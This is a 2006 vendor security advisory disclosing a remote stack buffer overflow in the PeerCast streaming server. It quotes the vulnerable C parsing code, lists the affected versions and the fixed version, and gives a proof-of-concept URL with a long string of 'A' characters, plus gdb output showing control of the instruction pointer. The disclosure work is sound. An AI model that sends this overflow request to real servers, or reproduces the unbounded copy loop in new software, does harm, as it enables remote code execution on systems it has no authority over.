INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow

["infocus" <infocus () infigo hr>]

                INFIGO IS Security Advisory #INFIGO-2006-03-01
			http://www.infigo.hr/ 



Title: PeerCast streaming server remote buffer overflow
Advisory ID: INFIGO-2006-03-01
Date: 2006-03-08
Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote and local
Vendors Status: Vendor was first contacted on 7th March 2006. 



==[ Overview 

PeerCast is a simple, free way to listen to radio and watch video on the
Internet. It uses P2P technology to let anyone become a broadcaster
without the costs of traditional streaming. This means you get to hear and
watch stations not normally found on commercially funded sites.
PeerCast is available for Linux, Windows and MacOS platforms.
More information can be found on http://www.peercast.org. 



==[ Vulnerability 

After short research, high-risk vulnerability was discovered in PeerCast
Streaming server. Unauthenticated remote user can send specially crafted
request to the HTTP server that will cause stack overflow, what can be
easily exploited for remote code execution. The problem is present in URL
handling code. When user requests special URL on the server (like
'stream'), arguments are processed with procConnectArgs() function. 

Vulnerable code in /code/common/servmgr.cpp
----------------------------------------
void ServMgr::procConnectArgs(char *str,ChanInfo &info)
{
        char arg[512];
	char curr[256]; 

        char *args = strstr(str,"?");
        if (args)
		*args++=0; 

	info.initNameID(str); 

        if (args)
	{ 

                while (args=nextCGIarg(args,curr,arg))
                {
                ...
                ...
                ...
---------------------------------------- 

Function procConnectArgs() will process arguments (char *str) passed to
the server script. Both buffers (arg[512] and curr[256]) allocated on the
stack can be overflowed inside of nextCGIarg() function in while() loop if
too long string is passed after '?' character in URL. 

Vulnerable code in /code/common/servhs.cpp:
-------------------------------------------
char *nextCGIarg(char *cp, char *cmd, char *arg)
{
        if (!*cp)
		return NULL; 

        // fetch command
        while (*cp)
        {
                char c = *cp++;
                if (c == '=')
                        break;
                else
                        *cmd++ = c;
        }
	*cmd = 0; 

        // fetch arg
        while (*cp)
        {
                char c = *cp++;
                if (c == '&')
                        break;
                else
                        *arg++ = c;
        }
	*arg = 0; 

        return cp;
}
---------------------------------------- 



==[ Affected Version 

PeerCast v0.1215 and lower. 



==[ Fix 

Upgrade to PeerCast v0.1217 



==[ PoC Exploit 

URL:
http://localhost:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800) 

gdb output...
[Switching to Thread 180236 (LWP 4526)]
0x41414141 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x74     116
edx            0x741c9f20       1948032800
ebx            0x4011fff4       1074921460
esp            0xbe3f9e84       0xbe3f9e84
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x210246 2163270
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb) 



==[ Credits 

Vulnerability discovered by Leon Juranic <leon.juranic () infigo hr>. 



==[ Contact 

INFIGO IS 

Web: http://www.infigo.hr
E-mail: infocus () infigo hr